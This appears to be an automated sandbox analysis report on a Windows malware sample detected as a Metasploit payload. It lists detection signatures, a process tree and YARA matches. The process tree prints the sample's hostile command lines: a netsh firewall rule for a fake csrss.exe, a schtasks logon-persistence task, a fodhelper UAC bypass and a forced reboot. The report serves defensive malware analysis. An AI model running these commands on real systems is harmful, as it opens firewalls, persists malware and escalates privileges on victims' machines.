Play interactive tour

Edit tour

Windows Analysis Report 1dyvctHqv1

Overview

General Information

Sample Name:	1dyvctHqv1 (renamed file extension from none to exe)
Analysis ID:	520213
MD5:	430e6667d7609792f43ef40150050e19
SHA1:	a2766c9bc772d3e5970ad00d25ddd460dfc9322c
SHA256:	1e227b989a219d8a1ba81633a8ff218e1acd87ec718382c0cb3ce5166d3f8c00
Tags:	32exe
Infos:
Most interesting Screenshot:

Detection

Metasploit

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Metasploit Payload

Detected unpacking (overwrites its own PE header)

Sigma detected: Schedule system process

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Multi AV Scanner detection for dropped file

Sigma detected: System File Execution Location Anomaly

Uses netsh to modify the Windows network and firewall settings

Found Tor onion address

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Creates files in the system32 config directory

May modify the system service descriptor table (often done to hook functions)

Performs DNS TXT record lookups

Drops executables to the windows directory (C:\Windows) and starts them

Uses schtasks.exe or at.exe to add and modify task schedules

Drops PE files with benign system names

Creates an autostart registry key pointing to binary in C:\Windows

Uses shutdown.exe to shutdown or reboot the system

Changes security center settings (notifications, updates, antivirus, firewall)

Machine Learning detection for dropped file

Modifies the windows firewall

Sigma detected: Bypass UAC via Fodhelper.exe

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Sample execution stops while process was sleeping (likely an evasion)

Downloads executable code via HTTP

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Sigma detected: Netsh Port or Application Allowed

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Creates files inside the system directory

PE file contains sections with non-standard names

Found potential string decryption / allocating functions

Found dropped PE file which has not been started or loaded

Enables debug privileges

Is looking for software installed on the system

AV process strings found (often used to terminate AV products)

PE file does not import any functions

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Contains capabilities to detect virtual machines

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

System is w10x64

1dyvctHqv1.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\1dyvctHqv1.exe" MD5: 430E6667D7609792F43EF40150050E19)

1dyvctHqv1.exe (PID: 5384 cmdline: C:\Users\user\Desktop\1dyvctHqv1.exe MD5: 430E6667D7609792F43EF40150050E19)

cmd.exe (PID: 6860 cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

netsh.exe (PID: 6840 cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)

csrss.exe (PID: 6644 cmdline: C:\Windows\rss\csrss.exe /301-301 MD5: 430E6667D7609792F43EF40150050E19)

schtasks.exe (PID: 5972 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 4860 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

conhost.exe (PID: 5072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

mountvol.exe (PID: 6596 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)

conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

mountvol.exe (PID: 5956 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)

conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

mountvol.exe (PID: 2976 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)

conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

mountvol.exe (PID: 4932 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)

conhost.exe (PID: 1580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

shutdown.exe (PID: 7128 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)

conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

WerFault.exe (PID: 7132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 7140 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3324 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6232 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6228 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4848 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cmd.exe (PID: 4936 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

fodhelper.exe (PID: 6648 cmdline: fodhelper MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)

fodhelper.exe (PID: 6408 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)

fodhelper.exe (PID: 3336 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)

csrss.exe (PID: 6880 cmdline: "C:\Windows\rss\csrss.exe" MD5: 430E6667D7609792F43EF40150050E19)

SgrmBroker.exe (PID: 5728 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

TrustedInstaller.exe (PID: 3108 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)

svchost.exe (PID: 1744 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4816 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6820 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 7116 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 5128 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

csrss.exe (PID: 2268 cmdline: C:\Windows\rss\csrss.exe MD5: 430E6667D7609792F43EF40150050E19)

csrss.exe (PID: 6860 cmdline: C:\Windows\rss\csrss.exe MD5: 430E6667D7609792F43EF40150050E19)

csrss.exe (PID: 4848 cmdline: "C:\Windows\rss\csrss.exe" MD5: 430E6667D7609792F43EF40150050E19)

csrss.exe (PID: 6708 cmdline: "C:\Windows\rss\csrss.exe" MD5: 430E6667D7609792F43EF40150050E19)

cmd.exe (PID: 7044 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000032.00000003.433190112.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000027.00000003.375600027.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000021.00000003.363027813.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000001F.00000003.374819187.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000034.00000003.403303463.000000000638A000.00000004.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000032.00000002.437840695.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000021.00000002.401387176.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000032.00000002.441852613.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000034.00000002.415283023.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000000C.00000002.327502514.00000000051A0000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000000.00000002.294589443.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0000001F.00000002.410184897.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000034.00000002.423136850.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000011.00000002.549328827.0000000000400000.00000040.00020000.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
00000027.00000002.415953009.0000000005700000.00000040.00000001.sdmp	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
52.2.csrss.exe.9ab080.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.2.csrss.exe.9ab080.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
52.3.csrss.exe.655bce0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.5ca4f30.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
52.3.csrss.exe.65540e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.2.1dyvctHqv1.exe.9a56e0.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
39.2.csrss.exe.9ab080.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.2.1dyvctHqv1.exe.9ab080.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
17.2.csrss.exe.9a56e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.3.1dyvctHqv1.exe.5ff40e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.2.csrss.exe.5ca4f30.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
39.3.csrss.exe.6559a80.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.3.1dyvctHqv1.exe.5e340e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.9a56e0.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
52.2.csrss.exe.9ad2e0.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.5caa8d0.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
17.3.csrss.exe.65540e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
33.3.csrss.exe.65540e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
39.2.csrss.exe.9ad2e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.2.1dyvctHqv1.exe.9ad2e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.2.1dyvctHqv1.exe.9a56e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
39.2.csrss.exe.5ca4f30.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.2.1dyvctHqv1.exe.574a8d0.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
17.2.csrss.exe.5caa8d0.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
33.2.csrss.exe.400000.2.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
31.3.csrss.exe.65540e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.2.1dyvctHqv1.exe.5744f30.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
33.3.csrss.exe.655bce0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.9ad2e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.9ab080.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
33.2.csrss.exe.9ab080.0.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.2.1dyvctHqv1.exe.51a0e50.10.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
17.3.csrss.exe.6559a80.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.3.csrss.exe.65540e0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.2.csrss.exe.400000.2.raw.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.3.1dyvctHqv1.exe.5e3bce0.2.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.3.csrss.exe.655bce0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
0.2.1dyvctHqv1.exe.400000.1.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
33.2.csrss.exe.5caa8d0.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.2.csrss.exe.400000.1.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
33.2.csrss.exe.400000.2.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
52.2.csrss.exe.5ca4f30.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
12.2.1dyvctHqv1.exe.51a0e50.10.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
17.2.csrss.exe.5700e50.9.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
52.2.csrss.exe.9a56e0.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
39.2.csrss.exe.5caa8d0.10.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.3.csrss.exe.6559a80.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.2.csrss.exe.9ad2e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
50.3.csrss.exe.5fb0000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
39.2.csrss.exe.400000.0.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.2.1dyvctHqv1.exe.558a8d0.9.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
33.2.csrss.exe.9ad2e0.3.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3c8b8:$s2: The Magic Word! 0x489f8:$s2: The Magic Word! 0x3cc18:$s3: Software\Oracle\VirtualBox 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
17.2.csrss.exe.5ca4f30.11.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x444b8:$s2: The Magic Word! 0x505f8:$s2: The Magic Word! 0x44818:$s3: Software\Oracle\VirtualBox 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
52.2.csrss.exe.5700e50.10.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
0.3.1dyvctHqv1.exe.5e39a80.1.raw.unpack	MAL_ME_RawDisk_Agent_Jan20_2	Detects suspicious malware using ElRawDisk	Florian Roth	0x3eb18:$s2: The Magic Word! 0x4ac58:$s2: The Magic Word! 0x3ee78:$s3: Software\Oracle\VirtualBox 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
